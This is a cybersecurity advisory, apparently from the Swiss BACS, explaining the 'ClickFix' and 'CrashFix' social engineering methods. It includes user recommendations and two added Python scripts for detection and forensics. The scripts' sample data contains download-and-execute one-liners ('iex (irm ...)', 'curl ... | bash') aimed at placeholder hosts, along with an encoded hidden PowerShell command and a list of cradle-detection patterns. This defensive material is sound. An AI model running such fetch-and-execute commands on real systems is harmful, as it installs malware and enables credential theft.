«ClickFix» - If a supposed error correction or verification installs malware

The BACS (Swiss Federal Office for Cybersecurity) is currently observing an increase in reports of the «ClickFix» infection method. By feigning a technical problem, attackers trick users into pasting malicious code into their computer's command line and executing it themselves. The scam neatly sidesteps technical security measures, because the victims effectively authorize the infection of their own system.


With so-called ClickFix, the user unsuspectingly inflicts the damage themselves. Photo: depositphotos/solarseven

Behind the term «ClickFix» lies a sophisticated social engineering tactic. The name describes a quick solution to a technical problem («fix») that is offered with a simple click («click»). The attackers compromise legitimate but poorly secured websites, or place advertisements that lead to specially prepared pages. As soon as someone visits such a page, a deceptively genuine-looking overlay or pop-up window appears.

According to this window, there is a technical problem: a failed browser update, a DNS error, a problem displaying the content or, most frequently, an alleged CAPTCHA that needs to be solved. To resolve the problem, the user is offered a button to click.

Examples of a «ClickFix» overlay. Photo: BACS

From the browser to the command line

Users have no idea that opening the website, or clicking the button, has already placed a malicious «PowerShell» command (on Windows) or a «Terminal» command (on macOS) on the clipboard. The victim is then instructed to press a few inconspicuous key combinations. These keystrokes do more than they appear to: on Windows, typically Win+R opens the Run dialog, Ctrl+V pastes the command that was copied to the clipboard in the background, and Enter executes it immediately, loading the malicious code.

Damage potential

As soon as the command is executed, the script attempts to connect to a server and download a malicious program. A direct download of malware from a website is often blocked by the browser or by antivirus software, but here the download command is issued by the user themselves and runs with their own privileges, so many security mechanisms do not raise an alarm. In most cases, a so-called «Infostealer» is downloaded. This malware specializes in reading passwords saved in browsers, emptying crypto wallets and stealing browser session cookies, which attackers can use to log into accounts (e.g. email or company systems) without a password. In company networks, this can also be the first step in a subsequent ransomware attack.
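The launch sequence described above leaves a characteristic trace in endpoint telemetry: an interpreter (PowerShell, cmd, mshta, bash) started by the desktop shell or a terminal application, with a download-and-execute one-liner on its command line. The following detection logic is an added example, not BACS code: it runs over a handful of constructed process-creation events in a simplified, hypothetical shape modelled on what Sysmon Event ID 1, Windows Event 4688 or macOS endpoint telemetry provide. The parent-process names for macOS terminal apps and all hostnames are assumptions.

```python
"""Spot ClickFix-style launches in process-creation telemetry (added example, not BACS code)."""
import re

# Interpreters the overlay tells the victim to paste into (Windows and macOS), lowercase.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
                "cscript.exe", "bash", "zsh", "sh", "osascript"}

# Parents that mean a human launched the child (Run dialog, desktop, a terminal app)
# rather than a script, scheduler or management agent. Terminal/iTerm2 are assumptions.
INTERACTIVE_PARENTS = {"explorer.exe", "Terminal", "iTerm2"}

# Download-and-execute cradle markers typical of the pasted one-liners.
CRADLE_PATTERNS = [
    r"\biex\b", r"invoke-expression", r"downloadstring", r"invoke-webrequest",
    r"\birm\b", r"\biwr\b", r"-e(c|nc|ncodedcommand)\b", r"-w(indowstyle)?\s+hidden",
    r"-e(p|xecutionpolicy)\s+bypass", r"\bmshta\b.*https?://",
    r"\bcurl\b.*\|\s*(ba|z)?sh\b", r"base64\s+(-d|--decode)",
]

def basename(path):
    """Last path component, for both backslash and slash separators."""
    return re.split(r"[\\/]", path)[-1]

def analyze(event):
    """Return the matched indicators and a verdict for one process-creation event."""
    child = basename(event["image"]).lower()
    parent = basename(event["parent_image"])
    hits = [p for p in CRADLE_PATTERNS if re.search(p, event["command_line"], re.IGNORECASE)]
    interactive = parent in INTERACTIVE_PARENTS
    # A human-launched interpreter with any cradle marker is worth a ticket; so is any
    # interpreter carrying two or more markers (hidden window plus encoded payload, say).
    suspicious = child in INTERPRETERS and ((interactive and len(hits) >= 1) or len(hits) >= 2)
    return {"child": child, "parent": parent, "interactive": interactive,
            "cradle_hits": hits, "suspicious": suspicious}

def triage(events):
    """Indexes of the events that should be escalated, in input order."""
    return [i for i, ev in enumerate(events) if analyze(ev)["suspicious"]]

# Constructed sample events (not real telemetry); hostnames use the reserved .invalid TLD.
SAMPLE_EVENTS = [
    {   # ClickFix on Windows: Win+R, Ctrl+V, Enter, so explorer.exe spawns PowerShell
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": 'powershell -w hidden -c "iex (irm http://captcha-check.invalid/verify)"',
    },
    {   # Legitimate maintenance script run by the task scheduler: no cradle markers
        "parent_image": r"C:\Windows\System32\svchost.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": r"powershell -NoProfile -File C:\Scripts\backup.ps1",
    },
    {   # macOS variant pasted into Terminal: curl piped into bash
        "parent_image": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal",
        "image": "/bin/bash",
        "command_line": 'bash -c "curl -fsSL http://fix-display.invalid/repair.sh | bash"',
    },
    {   # A user simply opened a command prompt from the Run dialog
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\cmd.exe",
        "command_line": "cmd",
    },
    {   # Second-stage launched by cmd rather than a person: several markers still catch it
        "parent_image": r"C:\Windows\System32\cmd.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell -ep bypass -w hidden -enc SQBFAFgAIAAoAC4ALgAuACkA",
    },
]

if __name__ == "__main__":
    for i in triage(SAMPLE_EVENTS):
        print(i, analyze(SAMPLE_EVENTS[i]))
```

The parent-process condition is what distinguishes this from generic "suspicious PowerShell" rules: a download cradle whose parent is explorer.exe almost always means someone typed it into the Run dialog, which is exactly the ClickFix signature, while the same cradle under a scheduler or agent calls for a different investigation. Tune INTERACTIVE_PARENTS and CRADLE_PATTERNS to your own telemetry before deploying.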

Advanced method: «CrashFix»

Further variants have emerged since the beginning of the year. One of them is known as «CrashFix». It relies on manipulated browser extensions disguised as useful tools such as ad blockers. These extensions are programmed to deliberately crash the browser after a delay. After the browser is restarted, a message appears prompting the user to «repair» the alleged error by entering certain commands. In reality, these commands install malware in the same way.

Recommendations

  • Be suspicious if a website claims that your browser needs to be updated or that an error can only be fixed by executing commands. Official browser updates are carried out via the browser's internal settings, never via a website.
  • Never copy code or commands from unknown sources into «PowerShell», the «Terminal» or the command prompt.
  • Do not install programs or browser extensions from unknown sources.
  • Inform employees about this specific scam. Knowing that a website will never ask you to enter commands into your system manually is the best protection.
  • In corporate environments, check whether the execution of «PowerShell» scripts can be restricted for normal users. Note that PowerShell's execution policy governs script files and does not stop an interactively pasted one-liner; application control (AppLocker or WDAC), Constrained Language Mode, or disabling the Run dialog for standard users is needed for that.
  • If you have fallen victim to such an attack, please report the incident.
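When investigating a suspected incident on a Windows machine, one quick check is the RunMRU registry key, where Windows records the commands a user typed into the Win+R Run dialog: each entry is stored as a string value with a trailing "\1", and the "MRUList" value lists the entry names from most to least recent. The following parser is an added example, not BACS code; it works on an exported .reg text rather than the live registry so that it runs anywhere, and the export below is constructed (hostname under the reserved .invalid TLD).

```python
"""Recover Run-dialog history from an exported RunMRU key (added example, not BACS code)."""
import re

# Constructed .reg export, as produced by `reg export` (quotes and backslashes are escaped).
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU]
"a"="cmd\\1"
"b"="powershell -w hidden -c \"iex (irm http://captcha-check.invalid/verify)\"\\1"
"c"="notepad\\1"
"MRUList"="bca"
'''

# One "name"="value" line; the value may contain escaped quotes and backslashes.
VALUE_LINE = re.compile(r'^"([^"]+)"="((?:[^"\\]|\\.)*)"$', re.MULTILINE)

def unescape(raw):
    """Undo .reg string escaping: \\" -> " and \\\\ -> \\ in a single pass."""
    return re.sub(r"\\(.)", r"\1", raw)

def parse_runmru(reg_text):
    """Return [(value_name, command), ...] ordered most recent first."""
    values = {name: unescape(raw) for name, raw in VALUE_LINE.findall(reg_text)}
    order = values.pop("MRUList", "")
    entries = []
    for name in order:
        cmd = values.get(name)
        if cmd is None:
            continue  # MRUList can reference a value that was already deleted
        if cmd.endswith("\\1"):
            cmd = cmd[:-2]  # strip the trailing "\1" flag Windows appends
        entries.append((name, cmd))
    return entries

def suspicious_entries(entries):
    """Run-dialog commands that fetch from the network or pipe into a shell."""
    marker = re.compile(r"https?://|\|", re.IGNORECASE)
    return [(name, cmd) for name, cmd in entries if marker.search(cmd)]

if __name__ == "__main__":
    history = parse_runmru(SAMPLE_REG)
    for name, cmd in history:
        print(name, repr(cmd))
    print("suspicious:", suspicious_entries(history))
```

On a live system the same key can be exported with `reg export "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" runmru.reg` for the affected user profile; the key only holds the Run dialog, so commands pasted directly into an already open PowerShell window will not appear here and have to be recovered from process telemetry or PowerShell logging instead.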

Source: BACS

